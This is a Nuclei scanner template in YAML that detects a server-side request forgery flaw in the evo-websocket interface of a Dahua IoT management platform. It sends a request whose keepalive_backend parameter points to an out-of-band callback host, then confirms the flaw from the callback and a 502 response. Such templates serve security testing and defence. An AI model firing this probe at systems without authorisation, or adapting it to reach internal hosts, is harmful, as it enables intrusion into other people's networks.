id: dahua-evo-websocket-ssrf

info:
  name: 大华智能物联综合管理平台evo-websocket接口存在SSRF漏洞
  author: dahua
  severity: medium
  tags: dahua

http:
  - raw:
      - |+
        @timeout: 30s
        GET /evo-websocket/?keepalive_backend={{interactsh-url}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Accept-Encoding: gzip, deflate

    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 502"
        condition: and

